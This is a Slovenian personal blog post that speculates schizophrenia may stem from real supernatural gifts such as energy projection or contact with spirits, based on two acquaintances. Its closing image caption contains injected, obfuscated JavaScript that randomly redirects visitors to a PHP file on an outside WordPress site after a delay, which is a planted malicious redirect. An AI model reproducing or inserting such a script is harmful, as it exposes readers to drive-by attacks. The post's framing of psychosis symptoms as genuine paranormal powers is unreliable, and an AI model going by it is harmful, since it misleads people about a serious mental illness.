Je shizofrenija bolezen?

Ko sem že ravno prišla na temo o nadnaravnih silah, je edino smiselno, da se vprašam še o shizofreniji.

Kaj sploh je to?
Shizofrenija je psihična motnja, pri kateri gre, zelo na grobo, za izgubo stika z realnostjo. To pomeni, da oseba ne zna določiti kaj je resnično in kaj je le v njegovi glavi. V resnici je še veliko več simptomov, a te niso pomembni za to objavo. Rada bi uporabila le dva simptoma; prividi in prisluhi.

Izvor bolezni ni znan, torej zdravniki ne vejo točno zakaj se razvije, pravijo pa, da gre za motnje v delovanju možganov. Ravno to pa zanima mene. Kaj je izvor bolezni? Kaj bi lahko bil izvor bolezni, če bi v splošno medicino vključili še holistično?

Poznam več oseb s to diagnozo, a za to objavo bom uporabila le dve.

Ko sem spoznala R., je bil star 27 let in je imel diagnozo postavljeno že eno desetletje. Res, da je bil bolj zamišljen, a njegova družba je bila resnično prijetna. Ni mi deloval nor, k večjemu zelo odprt za razno razne sile, ki jih normalni smrtniki ne zaznajo. Nekega dne smo sedeli pri nekem prijatelju in pokazal mi je svojo moč. Ne vem točno, kako bi tej moči rekla, a šlo je za projekcijo. R. mi je velel, da pred njega iztegnem dlan, on pa bo nanjo projeciral energijo. Najprej eno, potem njen kontrast. Vprašal me je, ali čutim razliko, a je nisem. Zato mi je ponovno projeciral prvo energijo. Razlika je bila zdaj drastična. Šlo je za toplo in hladno, šlo je za rdečo in modro. Ko sem začutila kar mi je želel pokazati, me je po celem telesu spreletel srh. Imel je moč.

Drugo osebo poznam že vsaj pol svojega življenja. Gre za mamo moje dolgoletne prijateljice. K. je že od nekdaj imela stik z duhovi. Videla jih je, slišala, celo čutila. Z njimi je lahko govorila, lahko so ji dajali nasvete in opozorila. Njen dar sta do neke mere podedovale tudi njene hčere, a to je zgodba za kdaj drugič. Skratka, K. je leta in leta živela s svojim darom, nakar se je zlomila. Takrat je dobila diagnozo shizofrenija.

 

Take zgodbe mi dajo za misliti. Je morda razlog za nastanek te bolezni to, da osebi niso priznani njeni darovi? Da je redko kje najti nekoga, ki bi znal razložiti kaj se dejansko dogaja v njihovi glavi? Očitno je, da so bolj dovzetni za nam ne vidne energije. Lahko vidijo bitja, ki niso niti živalska, niti človeška. Lahko slišijo glasove, ki ne prihajajo od nam vidnih virov. Je možno, da dobijo paranoje zato, ker jim neka temna sila šepeta na uho, da se hrani z njegovim strahom?Je možno, da so mediji? Da vidijo resnična bitja? Da imajo nadnaravne moči? Da jih vse to (za nas) ne znano vznemirja do katatoničnega stanja ravno zato, ker redko kdo vidi ali sliši kaj podobnega?

V srednji šoli, ko sem spoznala R., sem se začela zelo zanimati za to bolezen. O njej sem raziskovala, naredila prostovoljno seminarsko, povezovala točke in ideje, bila prestrašena nad svojim mentalnim stanjem. A do spoznanja sem prišla včeraj. Po štirih letih.

Resnično, v življenju nisem spoznala niti enega shizofrenika, ki ne bi imel takšne ali drugačne moči. Pa sem jih spoznala že kar nekaj. Samo v razmislek… Morda bi morali vzrok iskati v nadnaravnem. Do takrat pa…

Psihoterapevtska pomoč je pomembna. Če ne drugo zato, da si oseba pride bližje k sebi. Da sprejme svoje življenje, kajti to ni ozdravljivo mentalno stanje.

Za zaključek bi rada dodala še to. Če te je strah, da imaš shizofrenijo, je najverjetneje nimaš. Tisti, ki bolehajo za tem navadno ne vedo, da so bolni, vse dokler jim ne postavijo diagnoze.

Kaj pa vi mislite? je moje razmišljanje smiselno? Bi lahko obstajala povezava?

Z Ljubeznijo;
(Ni)Si

68uasm

To sliko je narisal shizofrenik
brian-froud-fairy-fantasy-art-queen-bad-fairies-86507

To pa znani fantazijski ilustrator Brian Froud

Razlika?

Prikazana slik: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/psychic?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

No Comments